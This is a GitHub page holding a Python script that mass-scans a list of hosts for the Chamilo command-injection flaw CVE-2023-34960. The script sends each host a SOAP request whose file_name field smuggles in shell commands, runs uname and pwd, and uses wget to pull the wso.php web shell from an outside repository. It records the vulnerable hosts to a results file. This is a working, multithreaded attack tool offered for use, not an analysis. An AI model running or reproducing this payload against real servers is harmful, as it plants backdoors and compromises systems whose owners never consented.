-
Notifications
You must be signed in to change notification settings - Fork 3
/
finder.py
118 lines (101 loc) · 3.92 KB
/
finder.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
import requests
import random
import warnings
import argparse
import os
import xml.etree.ElementTree as ET
from sys import stdout, exit
from multiprocessing.dummy import Pool
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from colorama import Fore, Style, init
import time
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
init(autoreset=True)
FY = Fore.YELLOW
FG = Fore.GREEN
FR = Fore.RED
FC = Fore.CYAN
FW = Fore.WHITE
fm = Fore.RED
fb = Fore.BLUE
fk = Fore.YELLOW
fi = Fore.GREEN
fc = Fore.CYAN
fp = Fore.WHITE
fu = Fore.MAGENTA
sd = Style.DIM
fr = Fore.RESET
sn = Style.NORMAL
sb = Style.BRIGHT
def logo():
clear = "\x1b[0m"
colors = [36, 32, 34, 35, 31, 37]
x = """
CVE-2023-34960 | Chamilo Command Injection
https://github.com/Mantodkaz
"""
for N, line in enumerate(x.split("\n")):
stdout.write("\x1b[1;%dm%s%s\n" % (random.choice(colors), line, clear))
time.sleep(0.05)
def users_agents():
with open("users_agents.txt", "r") as agent_txt:
user_agents = agent_txt.readlines()
user_agents = [ua.strip() for ua in user_agents if ua.strip()]
return user_agents
def chamilo(args):
url, user_agents = args
url = "http://" + url.strip("/")
body = f'''<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{url}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<ns1:wsConvertPpt>
<param0 xsi:type="ns2:Map">
<item>
<key xsi:type="xsd:string">file_data</key>
<value xsi:type="xsd:string"></value>
</item>
<item>
<key xsi:type="xsd:string">file_name</key>
<value xsi:type="xsd:string">`{{}}`.pptx'|" |uname -a;pwd;wget https://raw.githubusercontent.com/Mantodkaz/bekdur/main/php/wso.php||a #</value>
</item>
<item>
<key xsi:type="xsd:string">service_ppt2lp_size</key>
<value xsi:type="xsd:string">720x540</value>
</item>
</param0>
</ns1:wsConvertPpt>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>'''
headers = {'Content-Type': 'text/xml', 'User-Agent': random.choice(user_agents)}
try:
r = requests.post(f'{url}/main/webservices/additional_webservices.php', data=body, headers=headers, verify=False, timeout=5)
if r.status_code == 200 and "wsConvertPptResponse" in r.text:
vuln = ET.fromstring(r.text)
tagged = vuln.find('.//return')
if tagged is not None:
content = tagged.text
with open('resultVULN.txt', 'a') as o:
o.write(url + ' | wso.php | ' + content + '\n')
print(url + ' \033[0;37;42mVULNN!!!{}'.format(fp))
else:
print(url + ' \033[0;37;41mNOT VULN!{}'.format(fp))
except:
print(url + " \033[0;37;41mNOT VULN!{}".format(fp))
if __name__ == '__main__':
logo()
web = input('{}[>] {}List {}>{} '.format(FY, FG, FY, Style.RESET_ALL))
time.sleep(1)
try:
with open(web, 'r') as o:
oh = o.read().splitlines()
oh = list(oh)
except IOError:
sys.exit()
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--threads", type=int, default=10, help="Maximum number of concurrent threads")
args = parser.parse_args()
max_workers = args.threads
user_agents = users_agents()
args_list = [(url, user_agents) for url in oh]
lel = Pool(max_workers)
lel.map(chamilo, args_list)